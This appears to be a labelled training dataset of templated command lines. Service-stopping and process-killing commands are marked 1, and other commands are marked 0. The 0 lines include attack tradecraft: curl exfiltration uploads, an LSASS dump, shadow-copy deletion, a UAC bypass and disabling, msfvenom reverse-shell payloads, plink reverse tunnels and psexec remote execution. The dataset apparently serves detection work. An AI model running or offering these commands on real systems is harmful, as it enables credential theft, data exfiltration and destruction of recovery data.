1	sc stop ${service_name}
1	cmd /c "sc stop ${service_name}"
1	powershell -c "sc stop ${service_name}"
1	sc.exe stop ${service_name}
1	cmd /c "sc.exe stop ${service_name}"
1	powershell -c "sc.exe stop ${service_name}"
1	net stop ${service_name}
1	cmd /c "net stop ${service_name}"
1	powershell -c "net stop ${service_name}"
1	net.exe stop ${service_name}
1	cmd /c "net.exe stop ${service_name}"
1	powershell -c "net.exe stop ${service_name}"
1	taskkill /f /im ${process_name}
1	cmd /c "taskkill /f /im ${process_name}"
1	powershell -c "taskkill /f /im ${process_name}"
1	taskkill.exe /f /im ${process_name}
1	cmd /c "taskkill.exe /f /im ${process_name}"
1	powershell -c "taskkill.exe /f /im ${process_name}"
1	taskkill /im ${process_name}
1	cmd /c "taskkill /im ${process_name}"
1	powershell -c "taskkill /im ${process_name}"
1	taskkill.exe /im ${process_name}
1	cmd /c "taskkill.exe /im ${process_name}"
1	powershell -c "taskkill.exe /im ${process_name}"
1	taskkill /f /im ${process_name} /T
1	cmd /c "taskkill /f /im ${process_name} /T"
1	powershell -c "taskkill /f /im ${process_name} /T"
1	taskkill.exe /f /im ${process_name} /T
1	cmd /c "taskkill.exe /f /im ${process_name} /T"
1	powershell -c "taskkill.exe /f /im ${process_name} /T"
1	taskkill /im ${process_name} /T
1	cmd /c "taskkill /im ${process_name} /T"
1	powershell -c "taskkill /im ${process_name} /T"
1	taskkill.exe /im ${process_name} /T
1	cmd /c "taskkill.exe /im ${process_name} /T"
1	powershell -c "taskkill.exe /im ${process_name} /T"
1	taskkill /F /im ${process_name}
1	cmd /c "taskkill /F /im ${process_name}"
1	powershell -c "taskkill /F /im ${process_name}"
1	taskkill.exe /F /im ${process_name}
1	cmd /c "taskkill.exe /F /im ${process_name}"
1	powershell -c "taskkill.exe /F /im ${process_name}"
1	taskkill /F /im ${process_name} /T
1	cmd /c "taskkill /F /im ${process_name} /T"
1	powershell -c "taskkill /F /im ${process_name} /T"
1	taskkill.exe /F /im ${process_name} /T
1	cmd /c "taskkill.exe /F /im ${process_name} /T"
1	powershell -c "taskkill.exe /F /im ${process_name} /T"
1	taskkill /F /IM ${process_name}
1	cmd /c "taskkill /F /IM ${process_name}"
1	powershell -c "taskkill /F /IM ${process_name}"
1	taskkill.exe /F /IM ${process_name}
1	cmd /c "taskkill.exe /F /IM ${process_name}"
1	powershell -c "taskkill.exe /F /IM ${process_name}"
0	powershell -c "curl -v -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} 2> &1
0	cmd /c "plink -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	powershell -c "curl -v -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	cmd /c "procdump -ma lsass lsassdump.dmp"
0	arp.exe -a
0	cmd /c "mstsc /v:${ip_address} /remoteGuard"
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute}
0	cmd /c "vssadmin.exe Delete Shadows /All /Quiet"
0	Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
0	wmic os get OSArchitecture
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_EXPAND_SZ /f
0	nmap -p- -sC ${ip_address} 2> /dev/null
0	cmd /c "mstsc.exe /v:${ip_address} /f /remoteGuard"
0	powershell -c "wmic os get FreePhysicalMemory"
0	cmd /c "plink.exe -ssh -P ${remote_port} -l ${username} -pw ${password} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} -a attachement.txt
0	reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD /d 0 /f
0	cmd /c "del /f ${local_file_path}"
0	rm -r ${local_file_path} 2> /dev/null
0	cmd /c "ipconfig"
0	powershell -c "del /q ${local_file_path}"
0	rm -f ${local_file_path}
0	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain}
0	cmd /c "sdelete.exe -f -q -accepteula ${local_file_path}"
0	cmd /c "msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	curl.exe -v -X POST http://${ip_address}/upload -H -F files=@${source_file_path}
0	plink -ssh -P ${remote_port} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	cmd /c "rmdir /s ${local_file_path}"
0	ipconfig.exe
0	cmd /c "plink -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	psexec \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute} -d
0	cat email.txt | sendmail ${username}@${domain} 2> &1
0	cmd /c "7z.exe a -slp -p${password} ${destination_file_path} ${source_file_path}"
0	cat email.txt | ssmtp ${username}@${domain} 2> error.log
0	mailx -s ${email_subject} ${username}@${domain} < mail.txt 2> /dev/null
0	cmd /c "plink -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	powershell -c "7z a ${destination_file_path} ${source_file_path} -p"
0	echo ${email_content} | mailx -s ${email_subject} ${username}@${domain} 2> error.log
0	powershell -c "sdelete -s -q -accepteula ${local_file_path}"
0	cmd /c "certutil -encode -gmt ${source_file_path} ${destination_file_path}"
0	cmd /c "vssadmin.exe delete shadows /All"
0	msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	cmd /c "vssadmin.exe Delete Shadows /all /quiet"
0	nmap --open ${ip_address} 2> error.log
0	powershell -c "mstsc.exe /v:${ip_address} /f /multimon"
0	wmic.exe os get OSArchitecture
0	plink -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
0	nmap -A ${ip_address} 2> /dev/null
0	mstsc /v:${ip_address} /f /multimon
0	cmd /c "mstsc.exe /v:${ip_address} /f /public"
0	7z a -slp -p${password} ${destination_file_path} ${source_file_path}
0	choco install Megasync
